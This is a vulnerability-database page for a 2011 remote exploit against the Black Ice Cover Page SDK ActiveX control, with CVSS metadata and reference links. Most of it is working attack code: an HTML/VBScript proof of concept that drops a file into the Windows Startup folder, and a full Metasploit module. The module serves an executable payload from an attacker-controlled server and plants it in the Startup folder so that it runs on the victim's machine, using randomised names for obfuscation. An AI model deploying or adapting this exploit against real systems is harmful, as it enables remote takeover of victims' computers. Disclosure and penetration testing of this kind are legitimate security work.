Black Ice Cover Page SDK insecure method DownloadImageFileURL() exploit

2011.06.22
Credit: mr_me
Risk: High
Local: No
Remote: Yes
CWE: CWE-20


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

<html> Blackice Cover Page SDK insecure method DownloadImageFileURL() exploit <!-- RegKey Safe for Script: True RegkeySafe for Init: True KillBitSet: False vendor: http://www.blackice.com/ software link: http://www.blackice.com/DownloadForms/downloadformimp.asp?product=Cover+Page+Generator --> <object classid='clsid:79956462-F148-497F-B247-DF35A095F80B' id='target' ></object> <script language='vbscript'> arg1="http://www.google.com/robots.txt" arg2="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\robots.txt" target.DownloadImageFileURL arg1 ,arg2 </script> </html> # MSF Module ## # $Id: blackice_coverpage_download.rb 12540 2011-06-20 20:43:19Z mr_me $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :os_name => OperatingSystems::WINDOWS, :javascript => true, :rank => NormalRanking, :vuln_test => nil, }) def initialize(info = {}) super(update_info(info, 'Name' => 'Black Ice Cover Page ActiveX Control Arbitrary File Download', 'Description' => %q{ This module allows remote attackers to place arbitrary files on a users file system by abusing the "DownloadImageFileURL" method in the Black Ice BIImgFrm.ocx ActiveX Control (BIImgFrm.ocx 12.0.0.0). }, 'License' => MSF_LICENSE, 'Author' => [ 'mr_me' ], 'Version' => '$Revision: 12540 $', 'References' => [ [ 'CVE', '?'], [ 'OSVDB', '?'], [ 'URL', '?' ], ], 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f', }, 'Payload' => { 'Space' => 2048, 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 20 2011')) register_options( [ OptString.new('PATH', [ true, 'The path to place the executable.', 'C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\']), ], self.class) end def autofilter false end def check_dependencies use_zlib end def on_request_uri(cli, request) payload_url = "http://" payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/payload" if (request.uri.match(/payload/)) return if ((p = regenerate_payload(cli)) == nil) data = generate_payload_exe({ :code => p.encoded }) print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) return end # random junk vname = rand_text_alpha(rand(100) + 1) exe = rand_text_alpha(rand(20) + 1) clsid = "79956462-F148-497F-B247-DF35A095F80B" blackice = rand_text_alpha(rand(100) + 1) method = "DownloadImageFileURL" arg1 = rand_text_alpha(rand(100) + 1) arg2 = rand_text_alpha(rand(100) + 1) content = <<-EOS <html> <object classid='clsid:#{clsid}' id='#{blackice}' ></object> <script language='vbscript'> #{arg1} = "#{payload_url}" #{arg2} = "#{datastore['PATH']}#{exe}.exe" #{blackice}.#{method} #{arg1}, #{arg2} </script> </html> EOS print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, content) handler(cli) end end

References:

http://xforce.iss.net/xforce/xfdb/42891
http://www.vupen.com/english/advisories/2008/1768/references
http://www.milw0rm.com/exploits/5750
http://secunia.com/advisories/30548


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top